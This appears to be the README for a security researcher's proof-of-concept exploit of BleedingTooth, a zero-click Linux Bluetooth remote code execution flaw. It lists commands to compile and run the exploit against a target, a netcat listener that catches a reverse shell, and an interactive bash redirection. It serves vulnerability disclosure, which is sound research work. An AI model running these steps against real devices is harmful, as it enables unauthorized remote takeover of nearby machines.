security-research

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit is available at writeup.md.

Usage

Compile it using:

$ gcc -o exploit exploit.c -lbluetooth

and execute it as:

$ sudo ./exploit target_mac source_ip source_port

In another terminal, run:

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calc can be spawned with:

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)